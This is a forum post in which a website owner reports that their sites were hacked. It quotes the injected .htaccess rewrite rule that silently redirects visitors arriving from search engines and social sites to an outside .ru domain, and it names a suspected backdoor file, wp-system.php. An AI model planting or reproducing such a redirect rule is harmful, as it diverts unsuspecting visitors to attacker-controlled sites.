Well, they didnt get into my account through FTP. As of right now almost every site is being redirected with the following:
Code:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://medis-2011.ru/meteos?2 [R=301,L] </IfModule>
Even sites that were "fixed" have been re-routed again.
The host thinks the server was hacked by using:
mysite.com/wp-system.php
They say that how they got in.
There is also virus that is on my server: PUA.HTML.Crypt-8
BTW this is not Webair...